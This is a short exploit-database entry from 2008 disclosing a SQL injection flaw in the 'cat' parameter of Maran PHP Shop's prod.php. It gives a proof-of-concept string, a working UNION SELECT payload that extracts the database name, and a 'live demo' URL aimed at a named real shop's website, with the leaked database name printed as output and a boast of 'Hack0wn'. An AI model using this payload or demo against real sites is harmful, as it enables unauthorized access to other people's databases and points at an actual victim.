id: 4033
date: 11/02/2008
title: Maran PHP Shop (prod.php cat) SQL Injection Vulnerability
author: JosS
cves: 

=========================================================
Maran PHP Shop (prod.php cat) SQL Injection Vulnerability
=========================================================

# Maran PHP Shop (prod.php cat) SQL Injection Vulnerability
# url: http://www.maran.pamil-visions.com/maranshop.php
#
# Author: JosS
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

PoC: /prod.php?cat=7['SQL]
ExP: /prod.php?cat=7+and+1=2++union+all+select+database()--

live demo:
http://www.heimanis.lv/prod.php?cat=7+and+1=2++union+all+select+database()--

output:~$ latvello_heimanis

Hack0wn :D


#  0day.today [2023-03-26]  #